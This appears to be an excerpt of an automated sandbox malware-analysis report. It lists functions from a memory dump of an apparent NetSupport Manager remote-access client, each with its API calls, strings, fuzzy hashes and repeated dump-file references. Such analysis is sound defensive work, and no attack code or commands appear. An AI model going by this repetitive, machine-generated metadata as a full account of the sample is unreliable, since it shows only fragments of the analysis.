Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: CriticalSection$Leave$CreateEnterLibrary$AddressAllocateCloseEventExchangeFileFreeHandleHeapInterlockedLoadProc__wcstoi64_calloc_free_malloc
String ID: Audio$DisableSounds$Error. Vista AudioCapture GetInstance ret %s$Error. Vista AddAudioCaptureEventListener ret %s$InitCaptureSounds NT6$Vista AddAudioCapEvtListener(%p)$Vista new pAudioCap=%p$\\.\NSAudioFilter
API String ID: 1843377891-2362500394
Opcode ID: f60393b41353c13c745924059a021ceb37060bf1a09b9967f753d73c688ee9b2
Instruction ID: 3f9b0c4355a442be161718b687c517c7c1a8a488e2b9041c50d9e3709ff29e90
Opcode Fuzzy Hash: f60393b41353c13c745924059a021ceb37060bf1a09b9967f753d73c688ee9b2
Instruction Fuzzy Hash: 8E51D9B5E0464AAFE704CF74DC80BAEF7A4FB04759F10467AE929A3240E7717550C7A1

Function 1102B1D0 Relevance: 24.7, APIs: 6, Strings: 8, Instructions: 220COMMON

Download Yara Rule

APIs

Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509

GetLastError.KERNEL32(?), ref: 1102B331
GetLastError.KERNEL32(?), ref: 1102B38E
_fgets.LIBCMT ref: 1102B3C0
_strtok.LIBCMT ref: 1102B3E8

Part of subcall function 11163016: __getptd.LIBCMT ref: 11163034

_fgets.LIBCMT ref: 1102B424
_strtok.LIBCMT ref: 1102B438

Strings

*LookupFile, xrefs: 1102B258
WARN: Could not open TS lookup file: "%s" (%d), user="%s", xrefs: 1102B3A1
WARN: clientname is empty!, xrefs: 1102B498
WARN: No TS lookup file specified!, xrefs: 1102B29D
WARN: LoginUser failed (%d) user="%s", xrefs: 1102B338
IsA(), xrefs: 1102B286, 1102B363
LookupFileUser, xrefs: 1102B2FA
e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 1102B281, 1102B35E

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: ErrorLast$_fgets_strtok$ExitMessageProcess__getptdwsprintf
String ID: *LookupFile$IsA()$LookupFileUser$WARN: Could not open TS lookup file: "%s" (%d), user="%s"$WARN: LoginUser failed (%d) user="%s"$WARN: No TS lookup file specified!$WARN: clientname is empty!$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
API String ID: 78526175-1484737611
Opcode ID: ff60ef9c488c2c79b08b3262712ada230bbec0adfdbeaabbc1cb1cc15ddf1ff7
Instruction ID: 83a04ffa2f5f23a923324f4189043cfd8b751997b231b4d3af7dc0cd534076c2
Opcode Fuzzy Hash: ff60ef9c488c2c79b08b3262712ada230bbec0adfdbeaabbc1cb1cc15ddf1ff7
Instruction Fuzzy Hash: 2E81B675D00A1E9BDB10DBA4CC80FEEB7B9AF44309F4440D8E919A7245EA75AB84CF91

Function 11031160 Relevance: 23.0, APIs: 7, Strings: 6, Instructions: 245sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104,F3EE1E80,00000000,00000000,00000000), ref: 1103119A

Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D

EnumWindows.USER32(110301B0,00000001), ref: 11031272
EnumWindows.USER32(110301B0,00000000), ref: 110312CC
Sleep.KERNEL32(00000014,?,?,?,?,?,00000000), ref: 110312DC
Sleep.KERNEL32(?,?,?,?,?,?,00000000), ref: 11031313

Part of subcall function 11027E50: _memset.LIBCMT ref: 11027E85
Part of subcall function 11027E50: wsprintfA.USER32 ref: 11027EBA
Part of subcall function 11027E50: WaitForSingleObject.KERNEL32(?,000000FF), ref: 11027EFF
Part of subcall function 11027E50: GetExitCodeProcess.KERNEL32(?,?), ref: 11027F13
Part of subcall function 11027E50: CloseHandle.KERNEL32(?,00000000), ref: 11027F45
Part of subcall function 11027E50: CloseHandle.KERNEL32(?), ref: 11027F4E

Sleep.KERNEL32(0000000A,?,?,?,?,?,00000000), ref: 1103132B
SendMessageA.USER32(?,00000010,00000000,00000000), ref: 110313E7

Strings

close new explorer wnd x%x, xrefs: 110313AF
No new explorer wnd, xrefs: 110312F3
"%sNSMExec.exe" %s, xrefs: 11031285
\Explorer.exe, xrefs: 110311DA
*ExitMetroDelay, xrefs: 110311B2
Client, xrefs: 110311B7

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: SleepWindows$CloseEnumHandle$CodeDirectoryExitMessageObjectProcessSendSingleWait__wcstoi64_memsetwsprintf
String ID: "%sNSMExec.exe" %s$*ExitMetroDelay$Client$No new explorer wnd$\Explorer.exe$close new explorer wnd x%x
API String ID: 3887438110-1852639040
Opcode ID: dd4de2a7fc9d8cd5af608a89b0c8565785138ad2200bde7dfaaacefb5c936fd0
Instruction ID: 68f8b224c7beedd47666692ff363fa6bc3684c9dbb57027410f782db2506f70a
Opcode Fuzzy Hash: dd4de2a7fc9d8cd5af608a89b0c8565785138ad2200bde7dfaaacefb5c936fd0
Instruction Fuzzy Hash: 3391D0B5E002299FDB14CF64DC80BEEF7F5AF89308F1441A9D9599B640EB30AE45CB91

Function 1102310A Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 363windowCOMMON

Download Yara Rule

APIs

Part of subcall function 1115ADD0: IsIconic.USER32(?), ref: 1115AE77
Part of subcall function 1115ADD0: ShowWindow.USER32(?,00000009), ref: 1115AE87
Part of subcall function 1115ADD0: BringWindowToTop.USER32(?), ref: 1115AE91

CheckMenuItem.USER32(00000000,000013EB,-00000009), ref: 1102324D
ShowWindow.USER32(?,00000003), ref: 110232D1
LoadMenuA.USER32(00000000,000013A3), ref: 110233FB
GetSubMenu.USER32(00000000,00000000), ref: 11023409
CheckMenuItem.USER32(00000000,000013EB,?), ref: 11023429
GetDlgItem.USER32(?,000013B2), ref: 1102343C
GetWindowRect.USER32(00000000), ref: 11023443
PostMessageA.USER32(?,00000111,?,00000000), ref: 11023499
DestroyMenu.USER32(?,?,00000000,00000000,00000102,?,?,?,00000000), ref: 110234A3

Strings

Chat, xrefs: 110233B0
AddToJournal, xrefs: 110233AB

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: Menu$Window$Item$CheckShow$BringDestroyIconicLoadMessagePostRect
String ID: AddToJournal$Chat
API String ID: 693070851-2976406578
Opcode ID: d2fe2766ddb3d34030bb972f012e30f748b4f8edd59272365cd546290ab4e6ab
Instruction ID: 337dba7d0f02a97e7c7211def3ec221287211942730252afe18814347e7ecccc
Opcode Fuzzy Hash: d2fe2766ddb3d34030bb972f012e30f748b4f8edd59272365cd546290ab4e6ab
Instruction Fuzzy Hash: 87A1F178B04616ABDB09DF74CC85FAEB3E5AB88704F504519EA26DF2C0CF74B9408B65

Function 11105340 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 84fileCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 1110534D
EnterCriticalSection.KERNEL32(111F060C,?,00000000,?,?,1114D6ED,?,1118C583,?,1118C583,000000FF,?,1114DAFB), ref: 11105356
GetTickCount.KERNEL32 ref: 1110535C
GetTickCount.KERNEL32 ref: 1110538E
LeaveCriticalSection.KERNEL32(111F060C,?,00000000,?,?,1114D6ED,?,1118C583,?,1118C583,000000FF,?,1114DAFB), ref: 11105397
EnterCriticalSection.KERNEL32(?,?,00000000,?,?,1114D6ED,?,1118C583,?,1118C583,000000FF,?,1114DAFB), ref: 111053B8
WriteFile.KERNEL32(00000000,1118C583,?,?,00000000,?,00000000,?,?,1114D6ED,?,1118C583,?,1118C583,000000FF), ref: 111053D0
LeaveCriticalSection.KERNEL32(?,?,00000000,?,?,1114D6ED,?,1118C583,?,1118C583,000000FF,?,1114DAFB), ref: 111053DD
GetTickCount.KERNEL32 ref: 111053EC
LeaveCriticalSection.KERNEL32(111F060C,?,00000000,?,?,1114D6ED,?,1118C583,?,1118C583,000000FF,?,1114DAFB), ref: 111053F5

Strings

Warning. took %d ms to get simap lock, xrefs: 11105368
Warning. simap lock held for %d ms, xrefs: 111053A7, 11105405

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: CriticalSection$CountTick$Leave$Enter$FileWrite
String ID: Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock
API String ID: 831250470-625438208
Opcode ID: 7549535bd9f32612e90d0c37b89a6aa1a9d576740b26f55eee6ebfb36c9c683f
Instruction ID: 510883743b079e8f18b7a04972f4ca77f6f871929db96d85a9feff413df15827
Opcode Fuzzy Hash: 7549535bd9f32612e90d0c37b89a6aa1a9d576740b26f55eee6ebfb36c9c683f
Instruction Fuzzy Hash: F521F37AE10228ABDB009F759CC89AEFBADEB8972DB551075FC15CB204D6609C04CBA0

Function 11137340 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 74libraryloaderCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(00000000,75920BD0,00000000), ref: 11137363
GetModuleHandleA.KERNEL32(ntdll.dll), ref: 11137384
GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 11137394
GetModuleHandleA.KERNEL32(KERNEL32.DLL), ref: 111373B1
GetProcAddress.KERNEL32(00000000,VerifyVersionInfoA), ref: 111373BD
_memset.LIBCMT ref: 111373D7

Strings

KERNEL32.DLL, xrefs: 111373A8
ntdll.dll, xrefs: 1113737F
VerifyVersionInfoA, xrefs: 111373B7
Terminal Server, xrefs: 11137401
VerSetConditionMask, xrefs: 1113738E

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc$Version_memset
String ID: KERNEL32.DLL$Terminal Server$VerSetConditionMask$VerifyVersionInfoA$ntdll.dll
API String ID: 1659045089-3162170060
Opcode ID: 2782e45080b00d7644363843fb4dac8f82773bfcd6b8b8724ba95a014df5fc97
Instruction ID: 0c0b10a14524f440857339b23279ac9494b8b75ce88d62c7832b422cfd240681
Opcode Fuzzy Hash: 2782e45080b00d7644363843fb4dac8f82773bfcd6b8b8724ba95a014df5fc97
Instruction Fuzzy Hash: CB216A70F10329ABF720AB71AD44F5AFFA99B8871AF000474E914A7189EA71B9048765

Function 110390F0 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 225COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 1103910C
IsWindowEnabled.USER32(00000000), ref: 11039113
_memset.LIBCMT ref: 11039131
GetDlgItemTextA.USER32(?,0000044D,?,00000080), ref: 11039183
GetDlgItemTextA.USER32(?,0000044F,00000000,00000080), ref: 110391EB
GetDlgItemTextA.USER32(?,000004BE,00000000,00000080), ref: 1103924E
GetDlgItemTextA.USER32(?,000017EC,00000000,00000080), ref: 110392B1
GetDlgItemTextA.USER32(?,0000048E,00000000,00000080), ref: 11039377
GetDlgItemTextA.USER32(?,0000048D,00000000,00000080), ref: 11039314

Part of subcall function 11142800: _strncpy.LIBCMT ref: 11142824

Part of subcall function 11142290: _strncpy.LIBCMT ref: 111422D2

Strings

, xrefs: 110393B1

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: Item$Text$_strncpy$EnabledWindow_memset
String ID:
API String ID: 3085755443-3916222277
Opcode ID: 3474633675772f1dfa7fa715227e202affa5940b04f40e4fcdf8bfab1e55feb6
Instruction ID: 27c08bceae7d385fa57d2e1d5dbc2d5db1b5a631922e4fecc43e69d3347e8bff
Opcode Fuzzy Hash: 3474633675772f1dfa7fa715227e202affa5940b04f40e4fcdf8bfab1e55feb6
Instruction Fuzzy Hash: 6D819F75A10706ABE724DB74CC85F9AB3F9BF84704F50C598E2499B181DF71FA448BA0

Function 1106F060 Relevance: 16.8, APIs: 3, Strings: 8, Instructions: 297COMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 1106F397
EnterCriticalSection.KERNEL32(?,?,?,?,?,?), ref: 1106F3E8
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?), ref: 1106F408

Strings

UseNCS, xrefs: 1106F2F2
NameResp from %s(%s), len=%d/%d, flags=%d, channel=%s, xrefs: 1106F200
TCPIP, xrefs: 1106F1CA, 1106F2F7, 1106F358, 1106F375
ListenPort, xrefs: 1106F370
tracerecv, xrefs: 1106F1C5
%s:%d, xrefs: 1106F391
(null), xrefs: 1106F1DE, 1106F1F0
Port, xrefs: 1106F353

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeavewsprintf
String ID: %s:%d$(null)$ListenPort$NameResp from %s(%s), len=%d/%d, flags=%d, channel=%s$Port$TCPIP$UseNCS$tracerecv
API String ID: 3005300677-3496508882
Opcode ID: 813a8df51b421849a73fb34c3018abb507ddb1008c2509d1f87bc1f88576a655
Instruction ID: 2680b2d19a9bdf8eb0956d8c99ae1cac6e929f7b4449284ea49473897193c40b
Opcode Fuzzy Hash: 813a8df51b421849a73fb34c3018abb507ddb1008c2509d1f87bc1f88576a655
Instruction Fuzzy Hash: 9EB1A375E0022A9FDB14DF65CC50FAAB7B9AF49708F4041DCE909A7241EB71A981CF62

Function 11047160 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 330windowtimeCOMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 11047211
_malloc.LIBCMT ref: 110472AD
_memmove.LIBCMT ref: 11047312
SendMessageTimeoutA.USER32(?,0000004A,000404A0,00000005,00000002,00002710,?), ref: 11047372
_free.LIBCMT ref: 11047379

Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509

Part of subcall function 11043870: _free.LIBCMT ref: 11043907
Part of subcall function 11043870: _free.LIBCMT ref: 11043927
Part of subcall function 11043870: _strncpy.LIBCMT ref: 11043955
Part of subcall function 11043870: _strncpy.LIBCMT ref: 11043992
Part of subcall function 11043870: _malloc.LIBCMT ref: 110439CC

Strings

SurveyResults, xrefs: 110474E5
IsA(), xrefs: 1104729C, 110472D3, 110472FF, 1104733D
e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h, xrefs: 11047297, 110472CE, 110472FA, 11047338

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: _free$Message_malloc_strncpy$ErrorExitLastProcessSendTimeoutWindow_memmovewsprintf
String ID: IsA()$SurveyResults$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h
API String ID: 3960737985-1318765656
Opcode ID: 6f3482f183dc71e32b0e781e0e1ae71b2587e219f1bd543c2aaaf4bdd4110b9c
Instruction ID: e7dd2455d00588b8b0596ee18c4208b20e6f9302996f578dcf6f33cfb97cf12a
Opcode Fuzzy Hash: 6f3482f183dc71e32b0e781e0e1ae71b2587e219f1bd543c2aaaf4bdd4110b9c
Instruction Fuzzy Hash: 18C1A374E0064A9FDB04DFE4C8D0EEEF7B5BF88308F208168D519AB295DB70A945CB90

Function 1102D1A0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 156COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 1102D1C0

Part of subcall function 111603E3: std::exception::exception.LIBCMT ref: 111603F8
Part of subcall function 111603E3: __CxxThrowException@8.LIBCMT ref: 1116040D
Part of subcall function 111603E3: std::exception::exception.LIBCMT ref: 1116041E

_memmove.LIBCMT ref: 1102D24A
_memmove.LIBCMT ref: 1102D26E
_memmove.LIBCMT ref: 1102D2A8
_memmove.LIBCMT ref: 1102D2C4
std::exception::exception.LIBCMT ref: 1102D30E
__CxxThrowException@8.LIBCMT ref: 1102D323

Strings

deque<T> too long, xrefs: 1102D1BB

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
String ID: deque<T> too long
API String ID: 827257264-309773918
Opcode ID: 6f44853749167e6417c702704c1d5fd1f6b6aa11f4fe1b268de19c2d7f3316e5
